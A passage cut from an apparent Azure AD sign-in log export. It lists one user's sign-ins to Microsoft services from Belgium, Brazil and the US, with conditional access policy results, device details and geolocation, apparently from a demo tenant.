Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:33,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",5ef5316a-deee-4f03-8fd7-4abfce530600,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,5ef5316a-deee-4f03-8fd7-4abfce530600,SigninLogs,Sucess,50.6406517,5.572050095
+1422,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,34:09.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,97e25473-b2a3-4e28-a400-10e31453b779,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:34,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",5ef5316a-deee-4f03-8fd7-4abfaf540600,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 Exchange Online,5ef5316a-deee-4f03-8fd7-4abfaf540600,SigninLogs,Sucess,50.6406517,5.572050095
+1423,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,23:38.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0720c351-7b47-43c5-a372-d233bbbd2a96,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BR,Microsoft Flow Portal,6204c1d1-4712-4c46-a7d9-3ed63d992682,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 08:23,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",d3a3c86e-d6a1-4323-9bc0-1a2625f40600,,,"{'countryOrRegion': 'BR', 'geoCoordinates': {'longitude': -47.4056282043457, 'latitude': -20.547510147094727}, 'state': 'Sao Paulo', 'city': 'Franca'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Flow Service,d3a3c86e-d6a1-4323-9bc0-1a2625f40600,SigninLogs,Sucess,-20.54751015,-47.4056282
+1424,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,44:52.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,146733cb-b923-471f-8517-4cfd60bcf587,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:44,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",5423bf62-9037-4448-bcaa-30338a570600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -118.24053955078124, 'latitude': 34.0655517578125}, 'state': 'California', 'city': 'Los Angeles'}",none,none,none,medium,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,5423bf62-9037-4448-bcaa-30338a570600,SigninLogs,Sucess,34.06555176,-118.2405396
+1425,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,35:56.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5b16f2bc-2817-44a9-bd6a-f07237a9c774,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:35,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",24b904d7-063a-4f4c-9637-40c7ece50700,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,24b904d7-063a-4f4c-9637-40c7ece50700,SigninLogs,Sucess,50.6406517,5.572050095
+1426,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,24:53.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,4a252d35-6ad5-4394-a8ca-ef1d87f119e7,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BR,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 08:24,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",206c879d-2196-4a7a-8124-00226c8a0700,,,"{'countryOrRegion': 'BR', 'geoCoordinates': {'longitude': -47.4056282043457, 'latitude': -20.547510147094727}, 'state': 'Sao Paulo', 'city': 'Franca'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,206c879d-2196-4a7a-8124-00226c8a0700,SigninLogs,Sucess,-20.54751015,-47.4056282
+1427,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,46:04.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5509b988-bd2f-4848-84dd-6f93978b1fe9,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Microsoft Teams Web Client,5e3ce6c0-2b1f-4285-8d4b-75ee78787346,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:46,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",4f5563e9-cd91-4aaf-8dc5-b5ee923a0800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -118.24053955078124, 'latitude': 34.0655517578125}, 'state': 'California', 'city': 'Los Angeles'}",none,none,none,medium,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Stream Service,4f5563e9-cd91-4aaf-8dc5-b5ee923a0800,SigninLogs,Sucess,34.06555176,-118.2405396
+1428,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,31:08.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,08f76801-7f78-4c64-a873-fe83fc4f14e4,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Microsoft Teams,1fec8e78-bce4-4aaf-ab1b-5451cc387264,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:31,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'IE 7.0', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",48cf7de2-e659-4e20-aee0-25dc067a0700,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Teams Services,48cf7de2-e659-4e20-aee0-25dc067a0700,SigninLogs,Sucess,50.6406517,5.572050095
+1429,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,46:41.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5509b988-bd2f-4848-84dd-6f93978b1fe9,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Microsoft Teams Web Client,5e3ce6c0-2b1f-4285-8d4b-75ee78787346,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure 